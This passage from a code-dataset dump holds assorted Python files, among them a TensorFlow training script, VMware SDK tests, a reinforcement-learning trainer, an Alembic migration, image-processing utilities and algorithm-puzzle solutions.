name='acc_op')\n )\n tf.summary.scalar('acc', accuracy[1])\n tf.summary.scalar('loss', loss)\n return tf.estimator.EstimatorSpec(\n mode=tf.estimator.ModeKeys.TRAIN,\n loss=loss,\n train_op=optimizer.minimize(loss, tf.train.get_or_create_global_step())\n )\n if mode == tf.estimator.ModeKeys.EVAL:\n logits = model(features)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=tf.argmax(labels, axis=1, output_type=tf.int64), logits=logits)\n accuracy = tf.metrics.accuracy(\n labels=tf.argmax(labels, axis=1, output_type=tf.int64), predictions=tf.argmax(logits, axis=1, name='acc_op')\n )\n tf.summary.scalar('eval_oss', loss)\n tf.summary.scalar('eval_acc', accuracy[1])\n return tf.estimator.EstimatorSpec(\n mode=tf.estimator.ModeKeys.EVAL,\n loss=loss,\n eval_metric_ops={'accuracy': accuracy})\n\n # if mode == tf.estimator.ModeKeys.PREDICT:\n # logits = model(features)\n # predictions = {\n # 'classes': tf.argmax(logits, axis=1),\n # 'probabilities': tf.nn.softmax(logits),\n # }\n # return tf.estimator.EstimatorSpec(\n # mode=tf.estimator.ModeKeys.PREDICT,\n # predictions=predictions,\n # export_outputs={\n # 'classify': tf.estimator.export.PredictOutput(predictions)\n # }\n # )\n\n\ndef train_input_fn(args):\n \"\"\" like generator\"\"\"\n train_ds = tf.data.TFRecordDataset(train_path).map(parse_example).shuffle(62000).apply(\n tf.contrib.data.batch_and_drop_remainder(args.batch_size)).repeat(args.epochs)\n audios, labels = train_ds.make_one_shot_iterator().get_next()\n audios = tf.reshape(audios, (args.batch_size, 128, 47, 2))\n labels = tf.cast(labels,tf.int64)\n return audios, labels\n\n\ndef eval_input_fn(args):\n \"\"\" like generator\"\"\"\n dataset = tf.data.TFRecordDataset(test_path).map(parse_example).apply(\n tf.contrib.data.batch_and_drop_remainder(args.batch_size))\n\n audios, labels = dataset.make_one_shot_iterator().get_next()\n audios = tf.reshape(audios, (args.batch_size, 128, 47, 2))\n labels = tf.cast(labels, tf.int64)\n return audios, labels\n\n\ndef run_estimator_train(args):\n estimator = tf.estimator.Estimator(\n # config=tf.estimator.RunConfig(\n # model_dir=args.output_dir, save_summary_steps=100, keep_checkpoint_max=5,),\n model_fn=model_fn,\n # model_dir=args.output_dir,\n params={\n 'data_format': args.data_format,\n })\n train_spec = tf.estimator.TrainSpec(input_fn=lambda: train_input_fn(args),\n max_steps=(61220 // args.batch_size) * args.epochs)\n eval_spec = tf.estimator.EvalSpec(input_fn=lambda: eval_input_fn(args))\n\n tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)\n\n\ndef define_task_eager_flags():\n \"\"\"\n 定义一些flags方便在终端运行项目\n :return:\n \"\"\"\n arg = argparse.ArgumentParser()\n arg.add_argument('--batch_size', type=int, default=1)\n arg.add_argument('--epochs', type=int, default=5)\n arg.add_argument('--nb_layers', type=int, default=2)\n arg.add_argument('--n_db', type=int, default=2)\n arg.add_argument('--grow_rate', type=int, default=12)\n arg.add_argument('--data_format', type=str, default='channels_last')\n arg.add_argument('--output_dir', type=str, default='/home/ccyoung/')\n arg.add_argument('--lr', type=float, default=0.001)\n arg.add_argument('--log_interval', type=int, default=10)\n arg.add_argument('--alpha', type=float, default=0.2)\n\n args = arg.parse_args()\n return args\n\n\ndef main(args):\n run_estimator_train(args)\n try:\n run_estimator_train(args)\n finish_instance()\n except:\n finish_instance()\n # run_task_eager(args)\n # finish_instance()\n\n\ndef finish_instance():\n os.system('sh /data/stop_instance.sh')\n\n\nif __name__ == '__main__':\n args = define_task_eager_flags()\n main(args)\n","sub_path":"src/Estimator_DenseNet_train.py","file_name":"Estimator_DenseNet_train.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"238857819","text":"from pprint import pprint\nfrom unittest import TestCase\n\nfrom osbot_utils.testing.Catch import Catch\n\nfrom k8_vmware.helpers.TestCase_VM import TestCase_VM\nfrom k8_vmware.helpers.View_Soap_Calls import View_Soap_Calls\nfrom k8_vmware.vsphere.Sdk import Sdk\nfrom pyVmomi import pyVmomi\nfrom k8_vmware.vsphere.VM import VM\n\n\nclass test_Sdk(TestCase_VM):\n vm_name = f\"tests__unit__\" + __name__\n\n def setUp(self):\n self.sdk = Sdk()\n\n def test_about(self):\n content = self.sdk.about()\n assert content.vendor == \"VMware, Inc.\"\n assert content.version == \"6.7.0\"\n assert content.licenseProductName == \"VMware ESX Server\"\n assert content.licenseProductName == \"VMware ESX Server\"\n assert content.licenseProductVersion == \"6.0\"\n\n def test_file_info(self):\n datastore_path = 'an data store'\n vmx_file = self.sdk.file_info(datastore_path)\n assert vmx_file.vmPathName == datastore_path\n\n # def test_find_iso(self):\n # vm = self.sdk.find_by_host_name('haproxy-icap')\n # #pprint(vm.info())\n # #print(self.sdk.json_dump(\"VirtualMachine\",\"42\"))\n # #vim.vm.device.VirtualCdrom\n # print(vm.config().hardware)\n\n def test_find_by_host_name(self):\n for vm in self.sdk.vms():\n host_name = vm.host_name()\n if host_name:\n assert self.sdk.find_by_host_name(host_name).host_name() == host_name\n return\n print(\"Warning test ESX server had no VMs with host_names (dnsNames) setup\")\n\n def test_find_by_name(self):\n assert self.sdk.find_by_name(self.vm_name).name() == self.vm_name\n assert self.sdk.find_by_name(\"AAA_BBB_CCC\") is None\n\n\n def test_find_by_ip(self):\n for vm in self.sdk.vms():\n ip = vm.ip()\n if ip:\n assert self.sdk.find_by_ip(ip).ip() == ip\n return\n print(\"Warning test ESX server had no VMs with IPs\")\n\n def test_find_by_uuid(self):\n uuid = self.vm.uuid()\n assert self.sdk.find_by_uuid(uuid).uuid() == uuid\n\n def test_get_object(self):\n with View_Soap_Calls():\n name = self.vm.name()\n vm = self.sdk.get_object(pyVmomi.vim.VirtualMachine,name)\n pprint(vm)\n #assert vm.name == name\n\n def test_get_objects_Datastore(self):\n datastores = self.sdk.get_objects_Datastore()\n assert len(datastores) >0\n\n def test_get_object_virtual_machine(self):\n name = self.vm.name()\n vm = VM(self.sdk.get_object_virtual_machine(name))\n assert vm.name() == name\n\n def test_get_objects(self):\n objects = self.sdk.get_objects()\n assert len(objects) > 0\n\n def test_get_objects_properties(self):\n\n target_objects = [self.vm.vm] # use a temp vm to make sure we always have one\n object_type = type(self.vm.vm)\n vm_id = self.vm.id()\n\n properties_names = self.sdk.object_properties_names(object_type)\n results = self.sdk.get_objects_properties(object_type, target_objects, properties_names)\n\n assert vm_id == f'vim.VirtualMachine:{self.vm.moid()}'\n assert vm_id in results\n assert len(results) == 1\n object_properties = results[vm_id]\n properties_names.remove('alarmActionsEnabled') # these properties are not returned from the server\n properties_names.remove('parentVApp')\n properties_names.remove('snapshot')\n assert sorted(list(set(object_properties))) == sorted(properties_names)\n assert object_properties['name'] == self.vm.name()\n\n # to get properties from all current VMs use:\n # target_objects = self.sdk.get_objects_Virtual_Machines()\n\n\n def test_folders(self):\n folders = self.sdk.folders()\n assert str(folders) == \"['vim.Folder:ha-folder-vm']\"\n\n def test_object_filter_spec(self):\n # see test_get_objects_properties\n pass\n\n def test_object_methods_names(self):\n object_type = pyVmomi.vim.VirtualMachine\n method_names = self.sdk.object_methods_names(object_type)\n assert method_names == ['SetCustomValue', 'Destroy', 'Reload','Rename', # these ones where not in list(object._methodInfo.keys())\n 'AcquireMksTicket', 'AcquireTicket', 'Answer', 'ApplyEvcMode', 'AttachDisk', 'CheckCustomizationSpec', 'Clone', 'ConsolidateDisks', 'CreateScreenshot', 'CreateSecondaryEx',\n 'CreateSecondary', 'CreateSnapshotEx', 'CreateSnapshot', 'CryptoUnlock', 'Customize', 'DefragmentAllDisks', 'DetachDisk', 'DisableSecondary', 'DropConnections', 'EnableSecondary',\n 'EstimateStorageRequirementForConsolidate', 'ExportVm', 'ExtractOvfEnvironment', 'InstantClone', 'MakePrimary', 'MarkAsTemplate', 'MarkAsVirtualMachine', 'Migrate', 'MountToolsInstaller',\n 'PowerOff', 'PowerOn', 'PromoteDisks', 'PutUsbScanCodes', 'QueryChangedDiskAreas', 'QueryConnections', 'QueryFaultToleranceCompatibility', 'QueryFaultToleranceCompatibilityEx',\n 'QueryUnownedFiles', 'RebootGuest', 'Reconfigure', 'RefreshStorageInfo', 'Relocate', 'RemoveAllSnapshots', 'ResetGuestInformation', 'Reset', 'RevertToCurrentSnapshot', 'SendNMI',\n 'SetDisplayTopology', 'SetScreenResolution', 'ShutdownGuest', 'StandbyGuest', 'StartRecording', 'StartReplaying', 'StopRecording', 'StopReplaying', 'Suspend', 'TerminateFaultTolerantVM',\n 'Terminate', 'TurnOffFaultTolerance', 'UnmountToolsInstaller', 'Unregister', 'UpgradeTools', 'UpgradeVirtualHardware', 'ReloadFromPath']\n\n datastore_methods = self.sdk.object_methods_names(pyVmomi.vim.Datastore)\n\n assert datastore_methods == ['SetCustomValue', 'Destroy', 'Reload', 'Rename', 'EnterMaintenanceMode', 'ExitMaintenanceMode', 'DestroyDatastore', 'Refresh', 'RefreshStorageInfo',\n 'RenameDatastore', 'UpdateVVolVirtualMachineFiles', 'UpdateVirtualMachineFiles']\n\n def test_object_properties_names(self):\n object_type = pyVmomi.vim.VirtualMachine\n\n properties_names = self.sdk.object_properties_names(object_type)\n assert properties_names == ['value', 'availableField', 'parent', 'customValue', 'overallStatus', 'configStatus', 'configIssue', 'effectiveRole', 'permission', 'name', 'disabledMethod', 'recentTask',\n 'declaredAlarmState', 'triggeredAlarmState', 'alarmActionsEnabled', 'tag', 'capability', 'config', 'layout', 'layoutEx', 'storage', 'environmentBrowser', 'resourcePool',\n 'parentVApp', 'resourceConfig', 'runtime', 'guest', 'summary', 'datastore', 'network', 'snapshot', 'rootSnapshot', 'guestHeartbeatStatus']\n\n datastore_properties = self.sdk.object_properties_names(pyVmomi.vim.Datastore)\n assert datastore_properties == ['value', 'availableField', 'parent', 'customValue', 'overallStatus', 'configStatus', 'configIssue', 'effectiveRole', 'permission', 'name', 'disabledMethod', 'recentTask',\n 'declaredAlarmState', 'triggeredAlarmState', 'alarmActionsEnabled', 'tag', 'info', 'summary', 'host', 'vm', 'browser', 'capability', 'iormConfiguration']\n\n def test_vms(self):\n vms = self.sdk.vms()\n assert len(vms) > 0\n\n def test_names(self):\n names = self.sdk.vms_names()\n assert len(names) > 0\n\n def test_service_instance(self):\n service_instance = self.sdk.service_instance()\n assert service_instance.content.about.apiVersion == '6.7.3'\n assert service_instance.content.about.licenseProductName == 'VMware ESX Server'\n assert service_instance.content.about.osType == 'vmnix-x86'\n\n # def test_dump_json(self):\n #\n # obj_type = \"VirtualMachine\"\n # moid = self.vm.moid()\n #\n # json_dump = self.sdk.json_dump(obj_type, moid)\n # json_data = json.loads(json_dump)\n # assert json_data['_vimid' ] == moid\n # assert json_data['_vimtype'] == \"vim.VirtualMachine\"\n\n\n # todo: fix experiment (see tasks_recent_experiment)\n def test_tasks(self): # todo: find better way to do this since when running multiple tests the self.sdk.tasks_recent() can take multiple seconds to execute\n #with View_Soap_Calls():\n # with Catch():\n # #pprint(self.sdk.get_objects())\n # self.sdk.find_by_ip('aaaaaa')\n # recent_tasks = self.sdk.tasks_recent(self.vm.vm)\n # pprint(recent_tasks)\n # return\n self.sdk.find_by_ip('aaaaaa')\n recent_tasks = self.sdk.tasks_recent()\n most_recent_one = recent_tasks.pop()\n\n assert most_recent_one['DescriptionId'] == 'SearchIndex.findByIp'\n assert most_recent_one['Key' ] == f\"haTask--vim.SearchIndex.findByIp-{most_recent_one['EventChainId']}\"\n assert most_recent_one['State' ] == 'success'\n assert most_recent_one['Entity' ] == 'None'\n","sub_path":"tests/unit/vsphere/test_Sdk.py","file_name":"test_Sdk.py","file_ext":"py","file_size_in_byte":9229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"520865840","text":"# name : slip \n# date : 2019/7/6 9:17 \n# e-mail : slip1233@126.com\n\nimport threading\nimport time\n\nDICT = {}\nlock = threading.RLock()\n\ndef func(arg):\n\n lock.acquire()\n ident = threading.get_ident()\n DICT[ident] = arg\n time.sleep(0.1)\n print(DICT[ident], arg)\n lock.release()\n\n\nfor i in range(10):\n t = threading.Thread(target=func, args=(i, ))\n t.start()\n","sub_path":"进程线程/day33/7.锁local原理.py","file_name":"7.锁local原理.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"307233582","text":"#!/usr/bin/env python\n\nimport numpy as np\n\nfrom ars_lib.ars import ARSAgent, Normalizer, Policy, ParallelWorker\nfrom mini_bullet.minitaur_gym_env import MinitaurBulletEnv\n\nimport torch\nimport os\n\n# Multiprocessing package for python\n# Parallelization improvements based on:\n# https://github.com/bulletphysics/bullet3/blob/master/examples/pybullet/gym/pybullet_envs/ARS/ars.py\nimport multiprocessing as mp\nfrom multiprocessing import Pipe\n\n# Messages for Pipe\n_RESET = 1\n_CLOSE = 2\n_EXPLORE = 3\n\n\ndef main():\n \"\"\" The main() function. \"\"\"\n\n # Hold mp pipes\n mp.freeze_support()\n\n print(\"STARTING MINITAUR ARS\")\n\n # TRAINING PARAMETERS\n # env_name = \"MinitaurBulletEnv-v0\"\n seed = 0\n max_timesteps = 4e6\n eval_freq = 1e1\n save_model = True\n file_name = \"mini_ars_\"\n\n # Find abs path to this file\n my_path = os.path.abspath(os.path.dirname(__file__))\n results_path = os.path.join(my_path, \"../results\")\n models_path = os.path.join(my_path, \"../models\")\n\n if not os.path.exists(results_path):\n os.makedirs(results_path)\n\n if not os.path.exists(models_path):\n os.makedirs(models_path)\n\n env = MinitaurBulletEnv(render=False)\n\n # Set seeds\n env.seed(seed)\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n state_dim = env.observation_space.shape[0]\n print(\"STATE DIM: {}\".format(state_dim))\n action_dim = env.action_space.shape[0]\n print(\"ACTION DIM: {}\".format(action_dim))\n max_action = float(env.action_space.high[0])\n\n print(\"RECORDED MAX ACTION: {}\".format(max_action))\n\n # Initialize Normalizer\n normalizer = Normalizer(state_dim)\n\n # Initialize Policy\n policy = Policy(state_dim, action_dim)\n\n # Initialize Agent with normalizer, policy and gym env\n agent = ARSAgent(normalizer, policy, env)\n agent_num = 0\n if os.path.exists(models_path + \"/\" + file_name + str(agent_num) +\n \"_policy\"):\n print(\"Loading Existing agent\")\n agent.load(models_path + \"/\" + file_name + str(agent_num))\n\n # Evaluate untrained agent and init list for storage\n evaluations = []\n\n env.reset(agent.desired_velocity, agent.desired_rate)\n episode_reward = 0\n episode_timesteps = 0\n episode_num = 0\n\n # MULTIPROCESSING\n\n # Create mp pipes\n num_processes = policy.num_deltas\n processes = []\n childPipes = []\n parentPipes = []\n\n # Store mp pipes\n for pr in range(num_processes):\n parentPipe, childPipe = Pipe()\n parentPipes.append(parentPipe)\n childPipes.append(childPipe)\n\n # Start multiprocessing\n for proc_num in range(num_processes):\n p = mp.Process(target=ParallelWorker, args=(childPipes[proc_num], env))\n p.start()\n processes.append(p)\n\n print(\"STARTED MINITAUR ARS\")\n\n t = 0\n while t < (int(max_timesteps)):\n\n # Maximum timesteps per rollout\n t += policy.episode_steps\n\n episode_timesteps += 1\n\n episode_reward = agent.train_parallel(parentPipes)\n # episode_reward = agent.train()\n # +1 to account for 0 indexing.\n # +0 on ep_timesteps since it will increment +1 even if done=True\n print(\"Total T: {} Episode Num: {} Episode T: {} Reward: {}, >400: {}\".\n format(t, episode_num, policy.episode_steps, episode_reward,\n agent.successes))\n # Reset environment\n evaluations.append(episode_reward)\n episode_reward = 0\n episode_timesteps = 0\n\n # Evaluate episode\n if (episode_num + 1) % eval_freq == 0:\n # evaluate_agent(agent, env_name, seed,\n np.save(results_path + \"/\" + str(file_name), evaluations)\n if save_model:\n agent.save(models_path + \"/\" + str(file_name) +\n str(episode_num))\n # replay_buffer.save(t)\n\n episode_num += 1\n\n # Close pipes and hence envs\n for parentPipe in parentPipes:\n parentPipe.send([_CLOSE, \"pay2\"])\n\n for p in processes:\n p.join()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"spot_bullet/src/old_training_scripts/mini_ars.py","file_name":"mini_ars.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"164005014","text":"\"\"\"empty message\n\nRevision ID: 460ac76c6e10\nRevises: 360364f0db33\nCreate Date: 2018-10-05 19:54:09.846759\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '460ac76c6e10'\ndown_revision = '360364f0db33'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('common_post',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('title', sa.String(length=200), nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.Column('create_time', sa.DateTime(), nullable=True),\n sa.Column('board_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.String(length=100), nullable=True),\n sa.ForeignKeyConstraint(['board_id'], ['bk.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['frontuser.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('common_post')\n # ### end Alembic commands ###\n","sub_path":"pjbbs/migrations/versions/460ac76c6e10_.py","file_name":"460ac76c6e10_.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"392948749","text":"'''Função que calcula a quantidade total de calorias do pacote,\r\nquantide de calorias consumidas da porção atual e\r\nquantas porção o pacote serve'''\r\ndef calcularKcal(kcalPorGrama, tamanhoPkg, gramas, qtdPorcao):\r\n\tqtdPorcoes = tamanhoPkg / gramas\r\n\ttotalKcal = kcalPorGrama * qtdPorcoes\r\n\tqtdPorcaoConsumida = kcalPorGrama * qtdPorcao\r\n\t\r\n\tprint(\"Quantidade de Kcal do pacote: %s\" %totalKcal)\r\n\tprint(\"Quatidade de porções do pacorte: %s\" %qtdPorcoes)\r\n\tprint(\"Kcal da porção consumida: %s\" %qtdPorcaoConsumida)\r\n\t\r\n\r\n\t\r\ntamanhoPkg = int(raw_input(\"Digite o tamanho do pacote em gramas: \"))\r\ngramas = int(raw_input(\"Digite a quantidade de gramas por porção: \"))\r\nkcalPorGrama = int(raw_input(\"Digite a quantidade de Kcal por grama: \"))\r\nqtdPorcao = int(raw_input(\"Digite a quantidade de porção consumida: \"))\r\n\r\ncalcularKcal(kcalPorGrama, tamanhoPkg, gramas, qtdPorcao)\r\n","sub_path":"calculaKcal.py","file_name":"calculaKcal.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"6289893","text":"import os\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom skimage.filters.rank import median\r\nfrom skimage.morphology import disk\r\nfrom skimage.filters import sobel\r\n\r\nfrom scipy import ndimage\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nRESULTS_DIR = 'results'\r\nSUB_DIRS = ['cell_detection', 'white_detection', 'red_detection', 'processed_data']\r\nCELL_DIRS = ['edge', 'color']\r\n\r\nDEV_MODE = False\r\n\r\n\r\ndef build_dir(dir):\r\n if not os.path.exists(dir):\r\n os.makedirs(dir)\r\n\r\ndef create_dirs(sub_name):\r\n root_path = os.getcwd()\r\n results_path = os.path.join(root_path, RESULTS_DIR)\r\n subroot_path = os.path.join(results_path, sub_name)\r\n\r\n for sub_dir in SUB_DIRS:\r\n sub_path = os.path.join(subroot_path, sub_dir)\r\n if sub_dir == 'cell_detection':\r\n for cell_dir in CELL_DIRS:\r\n cell_path = os.path.join(sub_path, cell_dir)\r\n build_dir(cell_path)\r\n else:\r\n build_dir(sub_path)\r\n\r\n\r\ndef show_img(img):\r\n plt.imshow(img, cmap='gray')\r\n plt.show()\r\n\r\n\r\ndef show_ind_channels(img):\r\n figure, plots = plt.subplots(ncols=3, nrows=1)\r\n for i, subplot in zip(range(3), plots):\r\n temp = img[:, :, i]\r\n subplot.imshow(temp, cmap='gray')\r\n subplot.set_axis_off()\r\n plt.show()\r\n\r\n\r\ndef grayscale_img(alg, img):\r\n\r\n if alg == 'avg':\r\n return (img[:,:,0] + img[:,:,1] + img[:,:,2]) / 3\r\n\r\n if alg == 'luma':\r\n return 0.3 * img[:, :, 0] + 0.59 * img[:, :, 1] + 0.11 * img[:, :, 2]\r\n\r\n if alg == 'desat':\r\n temp = np.maximum(img[:, :, 0], img[:, :, 1])\r\n a = np.maximum(temp, img[:, :, 2])\r\n temp = np.minimum(img[:, :, 0], img[:, :, 1])\r\n b = np.minimum(temp, img[:, :, 2])\r\n return (a + b) / 2\r\n\r\n if alg == 'dcmin':\r\n temp = np.minimum(img[:, :, 0], img[:, :, 1])\r\n return np.minimum(temp, img[:, :, 2])\r\n\r\n if alg == 'dcmax':\r\n temp = np.maximum(img[:, :, 0], img[:, :, 1])\r\n return np.maximum(temp, img[:, :, 2])\r\n\r\n if alg == 'red':\r\n return img[:, :, 0]\r\n\r\n if alg == 'green':\r\n return img[:, :, 1]\r\n\r\n if alg == 'blue':\r\n return img[:, :, 2]\r\n\r\n\r\ndef invert_img(img):\r\n return 255 - img\r\n\r\n\r\ndef impose_img(lines, pic):\r\n out = pic.copy()\r\n out[lines > 0.5] = [255,255,255,0]\r\n return out\r\n\r\n\r\ndef apply_threshold(img, thresh):\r\n t_value = thresh/100 * 255\r\n img[img < t_value] = 0\r\n img[img >= t_value] = 255\r\n return img\r\n\r\n\r\ndef apply_smoothing(img):\r\n return median(img, disk(5))\r\n\r\n\r\ndef apply_filler(img):\r\n return ndimage.binary_fill_holes(img, structure=np.ones((15,15)))\r\n\r\n\r\ndef normalize(img):\r\n return img/255\r\n\r\n\r\ndef conv2uint8(img):\r\n return np.array(img, dtype=\"uint8\") * 250\r\n\r\n\r\nclass ImgProcessor:\r\n\r\n def __init__(self, sub_name, gray_scale_mode='dcmax', save_mode=True):\r\n root_path = os.getcwd()\r\n results_path = os.path.join(root_path, RESULTS_DIR)\r\n self.subroot_path = os.path.join(results_path, sub_name)\r\n self.gray_mode = gray_scale_mode\r\n self.save = save_mode\r\n\r\n def save_img(self, sub_dir, file_name, img):\r\n output_file = os.path.join(self.subroot_path, *sub_dir)\r\n output_file = os.path.join(output_file, file_name)\r\n\r\n cv2.imwrite(output_file, img)\r\n\r\n def detect_red_vessels(self, org_img, name, bgr_base, threshold):\r\n\r\n lower = np.array([max(0, x - threshold) for x in bgr_base], dtype=\"uint8\")\r\n upper = np.array([min(255, x + threshold) for x in bgr_base], dtype=\"uint8\")\r\n\r\n mask = cv2.inRange(org_img, lower, upper)\r\n img_masked = cv2.bitwise_and(org_img, org_img, mask=mask)\r\n\r\n img_gray = grayscale_img(self.gray_mode, img_masked)\r\n img_smooth = apply_smoothing(img_gray)\r\n\r\n if self.save:\r\n file_name, file_type = os.path.splitext(name)\r\n output_name = '{}_{}{}'.format(file_name, post_fix, file_type)\r\n self.save_img(sub_dir, output_name, img_smooth*255)\r\n\r\n return normalize(img_smooth)\r\n\r\n def detect_white_matter(self, org_img, name, red_scale, green_scale, blue_scale, threshold=100):\r\n t_value = threshold/100*255\r\n\r\n f_img = org_img\r\n org_img[red_scale < t_value] = [0, 0, 0]\r\n org_img[green_scale < t_value] = [0, 0, 0]\r\n org_img[blue_scale < t_value] = [0, 0, 0]\r\n\r\n org_img[red_scale >= t_value] = [255, 255, 255]\r\n org_img[green_scale >= t_value] = [255, 255, 255]\r\n org_img[blue_scale >= t_value] = [255, 255, 255]\r\n\r\n img_gray = grayscale_img(self.gray_mode, f_img)\r\n img_inv = invert_img(img_gray)\r\n img_filled = apply_filler(img_inv)\r\n img_smooth = apply_smoothing(img_filled)\r\n img_fill = apply_filler(img_smooth)\r\n img_proc = invert_img(img_fill*255)\r\n\r\n if DEV_MODE:\r\n show_img(img_fill)\r\n\r\n if self.save:\r\n sub_dir = ['white_detection']\r\n file_name, file_type = os.path.splitext(name)\r\n post_fix = 'white_th-{}'.format(threshold)\r\n output_name = '{}_{}{}'.format(file_name, post_fix, file_type)\r\n self.save_img(sub_dir, output_name, img_proc)\r\n\r\n return normalize(img_proc)\r\n\r\n def cell_detection(self, org_img, name, mode=0, threshold=100, boundaries=None):\r\n\r\n sub_dir = ['cell_detection']\r\n post_fix = 'cell_'\r\n if mode == 1:\r\n lower = boundaries[0]\r\n upper = boundaries[1]\r\n mask = cv2.inRange(org_img, np.array(lower, dtype=\"uint8\"), np.array(upper, dtype=\"uint8\"))\r\n img = cv2.bitwise_and(org_img, org_img, mask=mask)\r\n sub_dir.append('color')\r\n post_fix += 'color_(lb-{}_ub{}-)'.format(','.join(str(x) for x in lower),\r\n ','.join(str(x) for x in upper))\r\n else:\r\n img = org_img\r\n sub_dir.append('edge')\r\n post_fix += 'edge_th-{}'.format(threshold)\r\n\r\n img_gray = grayscale_img(self.gray_mode, img)\r\n\r\n img_inv = invert_img(img_gray)\r\n\r\n img_thresh = apply_threshold(img_inv, threshold)\r\n img_smooth = apply_smoothing(img_thresh)\r\n img_filled = apply_filler(img_smooth)\r\n img_proc = conv2uint8(img_filled)\r\n img_edges = sobel(img_filled)\r\n\r\n if mode == 1:\r\n img_proc = invert_img(img_proc)\r\n\r\n _, contours, _ = cv2.findContours(img_proc, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n if DEV_MODE:\r\n show_img(img_gray)\r\n show_img(img_proc)\r\n show_img(img_edges)\r\n\r\n if self.save:\r\n file_name, file_type = os.path.splitext(name)\r\n output_name = '{}_{}{}'.format(file_name, post_fix, file_type)\r\n self.save_img(sub_dir, output_name, img_edges*255)\r\n\r\n return normalize(img_proc), len(contours)\r\n\r\n\r\ndef test_util():\r\n create_dirs('test')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n test_util()","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250392223","text":"#\n# @lc app=leetcode id=15 lang=python3\n#\n# [15] 3Sum\n#\nclass Solution:\n # Time Limit Eceeeded\n # def twoSum(self, nums: List[int], sum_: int) -> List[List[int]]:\n # map = {}\n # result = []\n # for i in range(len(nums)):\n # if sum_ - nums[i] not in map:\n # map[sum_ - nums[i]] = i\n # for i in range(len(nums)):\n # if nums[i] in map and i != map[nums[i]]:\n # pair = sorted([nums[i], nums[map[nums[i]]]])\n # if pair not in result:\n # result.append(pair)\n # return result\n \n # def threeSum(self, nums: List[int]) -> List[List[int]]:\n # result = []\n # for i in range(len(nums)):\n # temp = nums.copy()\n # _ = temp.pop(i)\n # i_pair = self.twoSum(temp, - nums[i])\n # for p in i_pair:\n # pair = sorted([nums[i]] + p)\n # if pair not in result:\n # result.append(pair)\n # return result\n\n # Time Limit Exceeded\n # def threeSum(self, nums: List[int]) -> List[List[int]]:\n # result = []\n # nums = sorted(nums)\n # for i in range(len(nums)):\n # j = i + 1\n # k = len(nums) - 1\n # while (j < k):\n # if nums[j] + nums[k] == -nums[i]:\n # pair = [nums[i], nums[j], nums[k]]\n # if pair not in result:\n # result.append(pair)\n # j += 1\n # k -= 1\n # elif nums[j] + nums[k] < -nums[i]:\n # j += 1\n # else:\n # k -= 1\n # return result\n\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n result = []\n nums = sorted(nums)\n for i in range(len(nums)-2):\n if i > 0 and nums[i] == nums[i - 1]:\n continue\n j, k = i + 1, len(nums) - 1\n while j < k:\n s = nums[i] + nums[j] + nums[k]\n if s < 0:\n while j < k and nums[j] == nums[j + 1]:\n j += 1\n j += 1\n elif s > 0:\n while j < k and nums[k] == nums[k - 1]:\n k -= 1\n k -= 1\n else:\n result.append([nums[i], nums[j], nums[k]])\n while j < k and nums[j] == nums[j + 1]:\n j += 1\n while j < k and nums[k] == nums[k - 1]:\n k -= 1\n j += 1\n k -= 1\n return result\n","sub_path":"15.3-sum.py","file_name":"15.3-sum.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"529062627","text":"'''\n\t@judge UVa\n\t@id 574\n\t@name Sum It Up\n\n\t@tag Subset Sum\n'''\nfrom sys import stdin\nfrom itertools import chain, dropwhile\n\ndef answer(arr, t):\n\tif t == 0:\n\t\treturn [[]]\n\tif t < 0 or len(arr) == 0:\n\t\treturn []\n\tcnt = arr.count(arr[0])\n\tbrr = list(dropwhile(lambda x: x == arr[0], arr))\n\ts = [ [ arr[0] ] * x + ls for x in range(cnt, -1, -1) for ls in answer(brr, t - x * arr[0]) ]\n\treturn s\n\ndef solve(arr, t):\n\ts = answer(arr, t)\n\tif len(s) == 0:\n\t\treturn 'NONE'\n\treturn '\\n'.join(map(lambda ls: '+'.join(map(str, ls)), s))\n\nfor line in stdin:\n\tt, n, *arr = map(int, line.split())\n\tif n == 0:\n\t\tbreak\n\tprint(f'Sums of {t}:')\n\tprint(solve(arr, t))","sub_path":"since2020/UVa/UVa 574.py","file_name":"UVa 574.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"568764659","text":"# Copyright 2019 Nokia\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# 